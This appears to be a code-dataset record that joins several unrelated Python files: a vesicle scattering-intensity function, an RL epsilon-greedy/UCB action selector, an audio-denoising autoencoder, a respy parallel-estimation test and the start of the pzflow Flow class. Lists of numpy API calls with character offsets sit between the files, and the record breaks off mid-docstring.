IQid=np.zeros((len(qrange))) #initiates array for output IQ
### Parameters used to generate scatterer placements ###
Rcore=param[0]
dR_Ain=param[1]
dR_B=param[2]
dR_Aout=param[3]
sAin=param[4] # split of type A scatterer
sigmaR=param[5] # variation in Rcore, dispersity
#print(Rcore, dR_Ain, dR_B, dR_Aout, sAin)
Background=10**(-param[6])
varR = Rcore*sigmaR # variation in Rcore
disper = np.array([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]) # fixed intervals of sigma
sum_omegaarr=np.zeros((1,len(qrange)))
for step in range(0, nLP):
Rcore = param[0] + varR*disper[step + int((9-nLP)/2.)] ## add displacement to Rcore
# print("disper = ", disper[step + int((9-nLP)/2.)])
# print("Rcore = ", Rcore)
vol_B = (4/3.0)*np.pi*(np.power(Rcore + dR_Ain + dR_B, 3)
- np.power(Rcore + dR_Ain, 3)) ## volume of solvophobic layer B
nagg = int(np.true_divide( rho_B*vol_B, N*fb*MB )) ## number of chains in vesicle
ntot = nagg*num_scatterers ## total number of scatterers
nB = int(ntot*fb) ## number of scatterers in B
nAin = int(ntot*(1-fb)*sAin) ## number of scatterers in A_in
nAout = int(ntot*(1-fb)*(1-sAin)) ## number of scatterers in A_out
for reps in range(0, 3):
### Generates scatterer positions in structure ###
r = genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB)
### Calculates omega from scatterers in shape ###
sum_omegaarr += LPOmega(qrange, nAin, nAout, nB, r)
omegaarr=np.true_divide(sum_omegaarr,nLP*3) # average omega
omegaarr=omegaarr.reshape(len(qrange),)
Fqb=LPFbead(qrange,sigmabead) # calcualtes sphere shape factor
F2qb=np.multiply(Fqb,Fqb) # Sphere shape factor square
sqmm=np.ones((np.shape(Fqb))) # assuming dilute mixture the micelle-micelle structure factor = 1
F2qb_sqmm=np.multiply(F2qb,sqmm) # determines the micelle form factor
IQid=np.multiply(omegaarr,F2qb_sqmm) # calculates Icomp
maxIQ=np.max(IQid)
IQid=np.true_divide(IQid,maxIQ) # normalizes the I(q) to have its maximum = 1
IQid+=Background # add background
return IQid
|
[
"numpy.multiply",
"numpy.arccos",
"numexpr.evaluate",
"numpy.power",
"numpy.linalg.norm",
"numpy.max",
"numpy.square",
"numpy.array",
"numpy.zeros",
"numpy.isnan",
"numpy.true_divide",
"numpy.cos",
"numpy.random.uniform",
"numpy.sin",
"numpy.cbrt",
"numpy.shape",
"py3Dmol.view"
] |
[((119, 162), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(2 * np.pi)'], {'size': 'nsize'}), '(0, 2 * np.pi, size=nsize)\n', (136, 162), True, 'import numpy as np\n'), ((182, 218), 'numpy.random.uniform', 'np.random.uniform', (['(-1)', '(1)'], {'size': 'nsize'}), '(-1, 1, size=nsize)\n', (199, 218), True, 'import numpy as np\n'), ((233, 283), 'numpy.random.uniform', 'np.random.uniform', (['(rin ** 3)', '(rout ** 3)'], {'size': 'nsize'}), '(rin ** 3, rout ** 3, size=nsize)\n', (250, 283), True, 'import numpy as np\n'), ((299, 318), 'numpy.arccos', 'np.arccos', (['costheta'], {}), '(costheta)\n', (308, 318), True, 'import numpy as np\n'), ((959, 987), 'numpy.true_divide', 'np.true_divide', (['sigmabead', '(2)'], {}), '(sigmabead, 2)\n', (973, 987), True, 'import numpy as np\n'), ((994, 1016), 'numpy.multiply', 'np.multiply', (['qrange', 'R'], {}), '(qrange, R)\n', (1005, 1016), True, 'import numpy as np\n'), ((2902, 2916), 'py3Dmol.view', 'py3Dmol.view', ([], {}), '()\n', (2914, 2916), False, 'import py3Dmol\n'), ((3747, 3769), 'numpy.zeros', 'np.zeros', (['(1, 3, ntot)'], {}), '((1, 3, ntot))\n', (3755, 3769), True, 'import numpy as np\n'), ((3786, 3800), 'numpy.zeros', 'np.zeros', (['ntot'], {}), '(ntot)\n', (3794, 3800), True, 'import numpy as np\n'), ((337, 347), 'numpy.cbrt', 'np.cbrt', (['u'], {}), '(u)\n', (344, 347), True, 'import numpy as np\n'), ((385, 396), 'numpy.cos', 'np.cos', (['phi'], {}), '(phi)\n', (391, 396), True, 'import numpy as np\n'), ((433, 444), 'numpy.sin', 'np.sin', (['phi'], {}), '(phi)\n', (439, 444), True, 'import numpy as np\n'), ((463, 476), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (469, 476), True, 'import numpy as np\n'), ((1982, 2013), 'numexpr.evaluate', 'ne.evaluate', (['"""sin(Q*rs)/(Q*rs)"""'], {}), "('sin(Q*rs)/(Q*rs)')\n", (1993, 2013), True, 'import numexpr as ne\n'), ((2380, 2414), 'numexpr.evaluate', 'ne.evaluate', (['"""sum((vals), axis=0)"""'], {}), "('sum((vals), axis=0)')\n", (2391, 2414), True, 'import numexpr as ne\n'), ((2510, 2544), 'numpy.true_divide', 'np.true_divide', (['(2 * omegaarr)', 'Ntot'], {}), '(2 * omegaarr, Ntot)\n', (2524, 2544), True, 'import numpy as np\n'), ((7415, 7473), 'numpy.true_divide', 'np.true_divide', (['(self.N * self.lmono_b)', 'self.num_scatterers'], {}), '(self.N * self.lmono_b, self.num_scatterers)\n', (7429, 7473), True, 'import numpy as np\n'), ((9218, 9277), 'numpy.array', 'np.array', (['[-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]'], {}), '([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0])\n', (9226, 9277), True, 'import numpy as np\n'), ((10594, 10631), 'numpy.true_divide', 'np.true_divide', (['sum_omegaarr', '(nLP * 3)'], {}), '(sum_omegaarr, nLP * 3)\n', (10608, 10631), True, 'import numpy as np\n'), ((10805, 10826), 'numpy.multiply', 'np.multiply', (['Fqb', 'Fqb'], {}), '(Fqb, Fqb)\n', (10816, 10826), True, 'import numpy as np\n'), ((11024, 11047), 'numpy.multiply', 'np.multiply', (['F2qb', 'sqmm'], {}), '(F2qb, sqmm)\n', (11035, 11047), True, 'import numpy as np\n'), ((11115, 11147), 'numpy.multiply', 'np.multiply', (['omegaarr', 'F2qb_sqmm'], {}), '(omegaarr, F2qb_sqmm)\n', (11126, 11147), True, 'import numpy as np\n'), ((11194, 11206), 'numpy.max', 'np.max', (['IQid'], {}), '(IQid)\n', (11200, 11206), True, 'import numpy as np\n'), ((11254, 11281), 'numpy.true_divide', 'np.true_divide', (['IQid', 'maxIQ'], {}), '(IQid, maxIQ)\n', (11268, 11281), True, 'import numpy as np\n'), ((367, 380), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (373, 380), True, 'import numpy as np\n'), ((415, 428), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (421, 428), True, 'import numpy as np\n'), ((1089, 1104), 'numpy.power', 'np.power', (['QR', '(3)'], {}), '(QR, 3)\n', (1097, 1104), True, 'import numpy as np\n'), ((2078, 2092), 'numpy.isnan', 'np.isnan', (['vals'], {}), '(vals)\n', (2086, 2092), True, 'import numpy as np\n'), ((2280, 2294), 'numpy.isnan', 'np.isnan', (['vals'], {}), '(vals)\n', (2288, 2294), True, 'import numpy as np\n'), ((10902, 10915), 'numpy.shape', 'np.shape', (['Fqb'], {}), '(Fqb)\n', (10910, 10915), True, 'import numpy as np\n'), ((1051, 1061), 'numpy.sin', 'np.sin', (['QR'], {}), '(QR)\n', (1057, 1061), True, 'import numpy as np\n'), ((1738, 1757), 'numpy.square', 'np.square', (['all_disp'], {}), '(all_disp)\n', (1747, 1757), True, 'import numpy as np\n'), ((2969, 2987), 'numpy.linalg.norm', 'np.linalg.norm', (['ri'], {}), '(ri)\n', (2983, 2987), True, 'import numpy as np\n'), ((3006, 3024), 'numpy.linalg.norm', 'np.linalg.norm', (['ri'], {}), '(ri)\n', (3020, 3024), True, 'import numpy as np\n'), ((9790, 9832), 'numpy.true_divide', 'np.true_divide', (['(rho_B * vol_B)', '(N * fb * MB)'], {}), '(rho_B * vol_B, N * fb * MB)\n', (9804, 9832), True, 'import numpy as np\n'), ((1077, 1087), 'numpy.cos', 'np.cos', (['QR'], {}), '(QR)\n', (1083, 1087), True, 'import numpy as np\n'), ((9632, 9666), 'numpy.power', 'np.power', (['(Rcore + dR_Ain + dR_B)', '(3)'], {}), '(Rcore + dR_Ain + dR_B, 3)\n', (9640, 9666), True, 'import numpy as np\n'), ((9705, 9732), 'numpy.power', 'np.power', (['(Rcore + dR_Ain)', '(3)'], {}), '(Rcore + dR_Ain, 3)\n', (9713, 9732), True, 'import numpy as np\n')]
|
"""Strategies for selecting actions for value-based policies."""
from abc import ABC, abstractmethod
from typing import List, Optional
from numpy.typing import ArrayLike
import numpy as np
from rl.action_selectors import (
ActionSelector,
DeterministicActionSelector,
UniformDiscreteActionSelector,
NoisyActionSelector,
)
class ActionSelectionStrategy(ABC):
"""Base class for action selection strategies."""
@abstractmethod
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> ActionSelector:
pass
class EpsilonGreedy(ActionSelectionStrategy):
"""Implementation of epsilon greedy action selection.
Args:
epsilon: probability of taking action to explore rather than exploing
random_state: `None`, `int`, or `np.random.Generator` to initialise
RNG
"""
def __init__(self, epsilon: float = 0.0, random_state=None):
self.epsilon = epsilon
self._rng = np.random.default_rng(random_state)
def __call__(
self,
action_values: List[float],
action_counts: Optional[List[int]] = None,
) -> NoisyActionSelector:
"""Action counts do not matter for this strategy."""
greedy_action = int(np.argmax(action_values))
preferred = DeterministicActionSelector(greedy_action)
noise = UniformDiscreteActionSelector(
len(action_values), random_state=self._rng
)
return NoisyActionSelector(
self.epsilon, preferred, noise, random_state=self._rng
)
class UCB(ActionSelectionStrategy):
"""Upper confidence bound action selection strategy.
As defined in Sutton & Barto equation 2.10. However we floor action
counts at `eps` to avoid divide-by-zero.
`t` is inferred by summing the action counts vector and adding 1.
(Because `t` refers to the time step at which action values are being
estimated, i.e. the next time step since the last observation).
Args:
c: confidence parameter
eps: small number to floor zero counts at
"""
def __init__(self, c: float, eps: float = 1.0e-8):
self.c = c
self._eps = eps
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> DeterministicActionSelector:
chosen_action = int(np.argmax(self.ucb(action_values, action_counts)))
return DeterministicActionSelector(chosen_action)
def ucb(
self,
action_values: List[float],
action_counts: List[int],
) -> ArrayLike:
log_t = np.log(np.sum(action_counts) + 1)
floored_counts = np.maximum(action_counts, self._eps)
return action_values + self.c * np.sqrt(log_t / floored_counts)
|
[
"numpy.sqrt",
"numpy.random.default_rng",
"rl.action_selectors.DeterministicActionSelector",
"numpy.argmax",
"numpy.sum",
"rl.action_selectors.NoisyActionSelector",
"numpy.maximum"
] |
[((996, 1031), 'numpy.random.default_rng', 'np.random.default_rng', (['random_state'], {}), '(random_state)\n', (1017, 1031), True, 'import numpy as np\n'), ((1317, 1359), 'rl.action_selectors.DeterministicActionSelector', 'DeterministicActionSelector', (['greedy_action'], {}), '(greedy_action)\n', (1344, 1359), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((1487, 1562), 'rl.action_selectors.NoisyActionSelector', 'NoisyActionSelector', (['self.epsilon', 'preferred', 'noise'], {'random_state': 'self._rng'}), '(self.epsilon, preferred, noise, random_state=self._rng)\n', (1506, 1562), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((2442, 2484), 'rl.action_selectors.DeterministicActionSelector', 'DeterministicActionSelector', (['chosen_action'], {}), '(chosen_action)\n', (2469, 2484), False, 'from rl.action_selectors import ActionSelector, DeterministicActionSelector, UniformDiscreteActionSelector, NoisyActionSelector\n'), ((2678, 2714), 'numpy.maximum', 'np.maximum', (['action_counts', 'self._eps'], {}), '(action_counts, self._eps)\n', (2688, 2714), True, 'import numpy as np\n'), ((1271, 1295), 'numpy.argmax', 'np.argmax', (['action_values'], {}), '(action_values)\n', (1280, 1295), True, 'import numpy as np\n'), ((2626, 2647), 'numpy.sum', 'np.sum', (['action_counts'], {}), '(action_counts)\n', (2632, 2647), True, 'import numpy as np\n'), ((2755, 2786), 'numpy.sqrt', 'np.sqrt', (['(log_t / floored_counts)'], {}), '(log_t / floored_counts)\n', (2762, 2786), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to denoise a short speech sample using a pre-trained autoencoder.
PATH_TO_TRAINED_MODEL : path to the pre-trained model (.h5)
PATH_TO_AUDIO : path to the noisy audio file (.wav)
PATH_TO_SAVE : path to save the denoised audio output (.wav)
@author: nk
"""
#%% Dependencies
import numpy as np
import librosa
import soundfile
from tensorflow import keras
#%%
PATH_TO_TRAINED_MODEL = "./trained_models/audio_denoise_AE.h5"
PATH_TO_AUDIO = "./audio_files/test_noisy.wav"
PATH_TO_SAVE = "./audio_files/new_denoised.wav"
#%%
class _Denoise_AE:
'''
Singleton class for denoising short audio samples of spoken words.
'''
model = None
_instance = None
# This is the fitting constant, saved from the training session!
fitting_constant = 7.259422170994068
# This is the sample rate that the model is configured to work with.
SAMPLE_RATE = 22050
def preprocess(self, path_to_audio):
'''
Preprocesses audio file located at specified path.
- Fixes length to 1s
- Extracts spectrogram
'''
data, _ = librosa.load(path_to_audio, sr = self.SAMPLE_RATE)
duration = self.SAMPLE_RATE
# Pad to appropriate length...
if len(data) < duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
data = np.pad(data, (offset, duration-len(data)-offset), "constant")
# ... or cut to appropriate length...
elif len(data) > duration:
max_offset = np.abs(len(data) - duration)
offset = np.random.randint(max_offset)
data = data[offset:len(data)-max_offset+offset]
# ... or leave as is.
else:
offset = 0
# Spectrogram
S = np.abs(librosa.stft(data))[:-1,:]
return S
def denoise(self, path_to_audio):
'''
Denoises input with autoencoder.
'''
# Load spectrogram
S = self.preprocess(path_to_audio)
# Get dimensions
dim_1 = S.shape[0]
dim_2 = S.shape[1]
# Reshape as input tensor
S = np.reshape(S, (1, dim_1, dim_2, 1))
S /= self.fitting_constant
# Get denoised spectrogram from autoencoder
S_denoised = self.model.predict(S).reshape((dim_1, dim_2))
# Convert denoised spectrogram to time series waveform
denoised = librosa.griffinlim(S_denoised) * self.fitting_constant
return denoised
#%%
def Denoise_AE():
# Ensure single instance of AE
if _Denoise_AE()._instance is None:
_Denoise_AE._instance = _Denoise_AE()
_Denoise_AE.model = keras.models.load_model(PATH_TO_TRAINED_MODEL)
return _Denoise_AE._instance
#%%
if __name__ == "__main__":
dnae = Denoise_AE()
dnae2 = Denoise_AE()
assert dnae is dnae2
denoised = dnae.denoise(PATH_TO_AUDIO)
soundfile.write(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE)
|
[
"numpy.reshape",
"librosa.griffinlim",
"soundfile.write",
"numpy.random.randint",
"tensorflow.keras.models.load_model",
"librosa.stft",
"librosa.load"
] |
[((3027, 3084), 'soundfile.write', 'soundfile.write', (['PATH_TO_SAVE', 'denoised', 'dnae.SAMPLE_RATE'], {}), '(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE)\n', (3042, 3084), False, 'import soundfile\n'), ((1162, 1210), 'librosa.load', 'librosa.load', (['path_to_audio'], {'sr': 'self.SAMPLE_RATE'}), '(path_to_audio, sr=self.SAMPLE_RATE)\n', (1174, 1210), False, 'import librosa\n'), ((2235, 2270), 'numpy.reshape', 'np.reshape', (['S', '(1, dim_1, dim_2, 1)'], {}), '(S, (1, dim_1, dim_2, 1))\n', (2245, 2270), True, 'import numpy as np\n'), ((2775, 2821), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['PATH_TO_TRAINED_MODEL'], {}), '(PATH_TO_TRAINED_MODEL)\n', (2798, 2821), False, 'from tensorflow import keras\n'), ((1414, 1443), 'numpy.random.randint', 'np.random.randint', (['max_offset'], {}), '(max_offset)\n', (1431, 1443), True, 'import numpy as np\n'), ((2516, 2546), 'librosa.griffinlim', 'librosa.griffinlim', (['S_denoised'], {}), '(S_denoised)\n', (2534, 2546), False, 'import librosa\n'), ((1681, 1710), 'numpy.random.randint', 'np.random.randint', (['max_offset'], {}), '(max_offset)\n', (1698, 1710), True, 'import numpy as np\n'), ((1879, 1897), 'librosa.stft', 'librosa.stft', (['data'], {}), '(data)\n', (1891, 1897), False, 'import librosa\n')]
|
import numpy as np
import pytest
from respy import RespyCls
from respy.python.shared.shared_constants import IS_PARALLELISM_MPI
from respy.python.shared.shared_constants import IS_PARALLELISM_OMP
from respy.tests.codes.auxiliary import compare_est_log
from respy.tests.codes.auxiliary import simulate_observed
from respy.tests.codes.random_model import generate_random_model
@pytest.mark.skipif(
not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP, reason="No PARALLELISM available"
)
class TestClass(object):
"""This class groups together some tests."""
def test_1(self):
"""Ensure that it makes no difference whether the
criterion function is evaluated in parallel or not.
"""
# Generate random initialization file
constr = {
"program": {"version": "fortran"},
"estimation": {"maxfun": np.random.randint(0, 50)},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
# If delta is a not fixed, we need to ensure a bound-constraint optimizer.
# However, this is not the standard flag_estimation as the number of function
# evaluation is possibly much larger to detect and differences in the updates of
# the optimizer steps depending on the implementation.
if params_spec.loc[("delta", "delta"), "fixed"] is False:
options_spec["estimation"]["optimizer"] = "FORT-BOBYQA"
base = None
for is_parallel in [True, False]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
respy_obj = simulate_observed(respy_obj)
_, crit_val = respy_obj.fit()
if base is None:
base = crit_val
np.testing.assert_equal(base, crit_val)
def test_2(self):
""" This test ensures that the record files are identical.
"""
# Generate random initialization file. The number of periods is higher than
# usual as only FORTRAN implementations are used to solve the random request.
# This ensures that also some cases of interpolation are explored.
constr = {
"program": {"version": "fortran"},
"num_periods": np.random.randint(3, 10),
"estimation": {"maxfun": 0},
}
params_spec, options_spec = generate_random_model(point_constr=constr)
base_sol_log, base_est_info_log = None, None
base_est_log = None
for is_parallel in [False, True]:
options_spec["program"]["threads"] = 1
options_spec["program"]["procs"] = 1
if is_parallel:
if IS_PARALLELISM_OMP:
options_spec["program"]["threads"] = np.random.randint(2, 5)
if IS_PARALLELISM_MPI:
options_spec["program"]["procs"] = np.random.randint(2, 5)
respy_obj = RespyCls(params_spec, options_spec)
file_sim = respy_obj.get_attr("file_sim")
simulate_observed(respy_obj)
respy_obj.fit()
# Check for identical records
fname = file_sim + ".respy.sol"
if base_sol_log is None:
base_sol_log = open(fname, "r").read()
assert open(fname, "r").read() == base_sol_log
if base_est_info_log is None:
base_est_info_log = open("est.respy.info", "r").read()
assert open("est.respy.info", "r").read() == base_est_info_log
if base_est_log is None:
base_est_log = open("est.respy.log", "r").readlines()
compare_est_log(base_est_log)
|
[
"numpy.testing.assert_equal",
"respy.tests.codes.random_model.generate_random_model",
"respy.tests.codes.auxiliary.compare_est_log",
"numpy.random.randint",
"respy.RespyCls",
"pytest.mark.skipif",
"respy.tests.codes.auxiliary.simulate_observed"
] |
[((379, 487), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP)'], {'reason': '"""No PARALLELISM available"""'}), "(not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP,\n reason='No PARALLELISM available')\n", (397, 487), False, 'import pytest\n'), ((940, 982), 'respy.tests.codes.random_model.generate_random_model', 'generate_random_model', ([], {'point_constr': 'constr'}), '(point_constr=constr)\n', (961, 982), False, 'from respy.tests.codes.random_model import generate_random_model\n'), ((2693, 2735), 'respy.tests.codes.random_model.generate_random_model', 'generate_random_model', ([], {'point_constr': 'constr'}), '(point_constr=constr)\n', (2714, 2735), False, 'from respy.tests.codes.random_model import generate_random_model\n'), ((1894, 1929), 'respy.RespyCls', 'RespyCls', (['params_spec', 'options_spec'], {}), '(params_spec, options_spec)\n', (1902, 1929), False, 'from respy import RespyCls\n'), ((1954, 1982), 'respy.tests.codes.auxiliary.simulate_observed', 'simulate_observed', (['respy_obj'], {}), '(respy_obj)\n', (1971, 1982), False, 'from respy.tests.codes.auxiliary import simulate_observed\n'), ((2099, 2138), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['base', 'crit_val'], {}), '(base, crit_val)\n', (2122, 2138), True, 'import numpy as np\n'), ((2579, 2603), 'numpy.random.randint', 'np.random.randint', (['(3)', '(10)'], {}), '(3, 10)\n', (2596, 2603), True, 'import numpy as np\n'), ((3254, 3289), 'respy.RespyCls', 'RespyCls', (['params_spec', 'options_spec'], {}), '(params_spec, options_spec)\n', (3262, 3289), False, 'from respy import RespyCls\n'), ((3358, 3386), 'respy.tests.codes.auxiliary.simulate_observed', 'simulate_observed', (['respy_obj'], {}), '(respy_obj)\n', (3375, 3386), False, 'from respy.tests.codes.auxiliary import simulate_observed\n'), ((3965, 3994), 'respy.tests.codes.auxiliary.compare_est_log', 'compare_est_log', (['base_est_log'], {}), '(base_est_log)\n', (3980, 3994), False, 'from respy.tests.codes.auxiliary import compare_est_log\n'), ((866, 890), 'numpy.random.randint', 'np.random.randint', (['(0)', '(50)'], {}), '(0, 50)\n', (883, 890), True, 'import numpy as np\n'), ((1727, 1750), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (1744, 1750), True, 'import numpy as np\n'), ((1845, 1868), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (1862, 1868), True, 'import numpy as np\n'), ((3087, 3110), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (3104, 3110), True, 'import numpy as np\n'), ((3205, 3228), 'numpy.random.randint', 'np.random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (3222, 3228), True, 'import numpy as np\n')]
|
import itertools
from typing import Any, Callable, Sequence, Tuple
import dill as pickle
import jax.numpy as np
import numpy as onp
import pandas as pd
from jax import grad, jit, ops, random
from jax.experimental.optimizers import Optimizer, adam
from pzflow import distributions
from pzflow.bijectors import Bijector_Info, InitFunction, Pytree
from pzflow.utils import build_bijector_from_info, gaussian_error_model
class Flow:
"""A normalizing flow that models tabular data.
Attributes
----------
data_columns : tuple
List of DataFrame columns that the flow expects/produces.
conditional_columns : tuple
List of DataFrame columns on which the flow is conditioned.
info : Any
Object containing any kind of info included with the flow.
Often describes the data the flow is trained on.
latent
The latent distribution of the normalizing flow.
Has it's own sample and log_prob methods.
"""
def __init__(
self,
data_columns: Sequence[str] = None,
bijector: Tuple[InitFunction, Bijector_Info] = None,
conditional_columns: Sequence[str] = None,
latent=None,
data_error_model: Callable = None,
condition_error_model: Callable = None,
autoscale_conditions: bool = True,
seed: int = 0,
info: Any = None,
file: str = None,
_dictionary: dict = None,
):
"""Instantiate a normalizing flow.
Note that while all of the init parameters are technically optional,
you must provide either data_columns and bijector OR file.
In addition, if a file is provided, all other parameters must be None.
Parameters
----------
data_columns : Sequence[str], optional
Tuple, list, or other container of column names.
These are the columns the flow expects/produces in DataFrames.
bijector : Bijector Call, optional
A Bijector call that consists of the bijector InitFunction that
initializes the bijector and the tuple of Bijector Info.
Can be the output of any Bijector, e.g. Reverse(), Chain(...), etc.
conditional_columns : Sequence[str], optional
Names of columns on which to condition the normalizing flow.
latent : distribution, optional
The latent distribution for the normalizing flow. Can be any of
the distributions from pzflow.distributions. If not provided,
a normal distribution is used with the number of dimensions
inferred.
data_error_model : Callable, optional
A callable that defines the error model for data variables.
data_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of data variables, where the order
of variables matches the order of the columns in data_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
data_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If data_error_model is not provided, a Gaussian error model is assumed.
condition_error_model : Callable, optional
A callable that defines the error model for conditional variables.
condition_error_model must take key, X, Xerr, nsamples as arguments where:
key is a jax rng key, e.g. jax.random.PRNGKey(0)
X is a 2 dimensional array of conditional variables, where the order
of variables matches the order of the columns in conditional_columns
Xerr is the corresponding 2 dimensional array of errors
nsamples is the number of samples to draw from the error distribution
condition_error_model must return an array of samples with the shape
(X.shape[0], nsamples, X.shape[1]).
If condition_error_model is not provided, a Gaussian error model is assumed.
autoscale_conditions : bool, default=True
Sets whether or not conditions are automatically standard scaled when
passed to a conditional flow. I recommend you leave this as True.
seed : int, default=0
The random seed for initial parameters
info : Any, optional
An object to attach to the info attribute.
file : str, optional
Path to file from which to load a pretrained flow.
If a file is provided, all other parameters must be None.
"""
# validate parameters
if (
data_columns is None
and bijector is None
and file is None
and _dictionary is None
):
raise ValueError("You must provide data_columns and bijector OR file.")
if data_columns is not None and bijector is None:
raise ValueError("Please also provide a bijector.")
if data_columns is None and bijector is not None:
raise ValueError("Please also provide data_columns.")
if any(
(
data_columns is not None,
bijector is not None,
conditional_columns is not None,
latent is not None,
data_error_model is not None,
condition_error_model is not None,
info is not None,
)
):
if file is not None:
raise ValueError(
"If providing a file, please do not provide any other parameters."
)
if _dictionary is not None:
raise ValueError(
"If providing a dictionary, please do not provide any other parameters."
)
if file is not None and _dictionary is not None:
raise ValueError("Only provide file or _dictionary, not both.")
# if file or dictionary is provided, load everything from it
if file is not None or _dictionary is not None:
save_dict = self._save_dict()
if file is not None:
with open(file, "rb") as handle:
save_dict.update(pickle.load(handle))
else:
save_dict.update(_dictionary)
if save_dict["class"] != self.__class__.__name__:
raise TypeError(
f"This save file isn't a {self.__class__.__name__}."
+ f"It is a {save_dict['class']}"
)
# load columns and dimensions
self.data_columns = save_dict["data_columns"]
self.conditional_columns = save_dict["conditional_columns"]
self._input_dim = len(self.data_columns)
self.info = save_dict["info"]
# load the latent distribution
self._latent_info = save_dict["latent_info"]
self.latent = getattr(distributions, self._latent_info[0])(
*self._latent_info[1]
)
# load the error models
self.data_error_model = save_dict["data_error_model"]
self.condition_error_model = save_dict["condition_error_model"]
# load the bijector
self._bijector_info = save_dict["bijector_info"]
init_fun, _ = build_bijector_from_info(self._bijector_info)
_, self._forward, self._inverse = init_fun(
random.PRNGKey(0), self._input_dim
)
self._params = save_dict["params"]
# load the conditional means and stds
self._condition_means = save_dict["condition_means"]
self._condition_stds = save_dict["condition_stds"]
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = save_dict["autoscale_conditions"]
# if no file is provided, use provided parameters
else:
self.data_columns = tuple(data_columns)
self._input_dim = len(self.data_columns)
self.info = info
if conditional_columns is None:
self.conditional_columns = None
self._condition_means = None
self._condition_stds = None
else:
self.conditional_columns = tuple(conditional_columns)
self._condition_means = np.zeros(len(self.conditional_columns))
self._condition_stds = np.ones(len(self.conditional_columns))
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = autoscale_conditions
# set up the latent distribution
if latent is None:
self.latent = distributions.Normal(self._input_dim)
else:
self.latent = latent
self._latent_info = self.latent.info
# set up the error models
if data_error_model is None:
self.data_error_model = gaussian_error_model
else:
self.data_error_model = data_error_model
if condition_error_model is None:
self.condition_error_model = gaussian_error_model
else:
self.condition_error_model = condition_error_model
# set up the bijector with random params
init_fun, self._bijector_info = bijector
bijector_params, self._forward, self._inverse = init_fun(
random.PRNGKey(seed), self._input_dim
)
self._params = (self.latent._params, bijector_params)
def _get_conditions(self, inputs: pd.DataFrame) -> np.ndarray:
"""Return an array of the bijector conditions."""
# if this isn't a conditional flow, just return empty conditions
if self.conditional_columns is None:
conditions = np.zeros((inputs.shape[0], 1))
# if this a conditional flow, return an array of the conditions
else:
columns = list(self.conditional_columns)
conditions = np.array(inputs[columns].values)
conditions = (conditions - self._condition_means) / self._condition_stds
return conditions
def _get_err_samples(
self,
key,
inputs: pd.DataFrame,
err_samples: int,
type: str = "data",
skip: str = None,
) -> np.ndarray:
"""Draw error samples for each row of inputs. """
X = inputs.copy()
# get list of columns
if type == "data":
columns = list(self.data_columns)
error_model = self.data_error_model
elif type == "conditions":
if self.conditional_columns is None:
return np.zeros((err_samples * X.shape[0], 1))
else:
columns = list(self.conditional_columns)
error_model = self.condition_error_model
else:
raise ValueError("type must be `data` or `conditions`.")
# make sure all relevant variables have error columns
for col in columns:
# if errors not provided for the column, fill in zeros
if f"{col}_err" not in inputs.columns and col != skip:
X[f"{col}_err"] = np.zeros(X.shape[0])
# if we are skipping this column, fill in nan's
elif col == skip:
X[col] = np.nan * np.zeros(X.shape[0])
X[f"{col}_err"] = np.nan * np.zeros(X.shape[0])
# pull out relevant columns
err_columns = [col + "_err" for col in columns]
X, Xerr = np.array(X[columns].values), np.array(X[err_columns].values)
# generate samples
Xsamples = error_model(key, X, Xerr, err_samples)
Xsamples = Xsamples.reshape(X.shape[0] * err_samples, X.shape[1])
# delete the column corresponding to skip
if skip is not None:
idx = columns.index(skip)
Xsamples = np.delete(Xsamples, idx, axis=1)
# if these are samples of conditions, standard scale them!
if type == "conditions":
Xsamples = (Xsamples - self._condition_means) / self._condition_stds
return Xsamples
def _log_prob(
self, params: Pytree, inputs: np.ndarray, conditions: np.ndarray
) -> np.ndarray:
"""Log prob for arrays."""
# calculate log_prob
u, log_det = self._forward(params[1], inputs, conditions=conditions)
log_prob = self.latent.log_prob(params[0], u) + log_det
# set NaN's to negative infinity (i.e. zero probability)
log_prob = np.nan_to_num(log_prob, nan=np.NINF)
return log_prob
def log_prob(
self, inputs: pd.DataFrame, err_samples: int = None, seed: int = None
) -> np.ndarray:
"""Calculates log probability density of inputs.
Parameters
----------
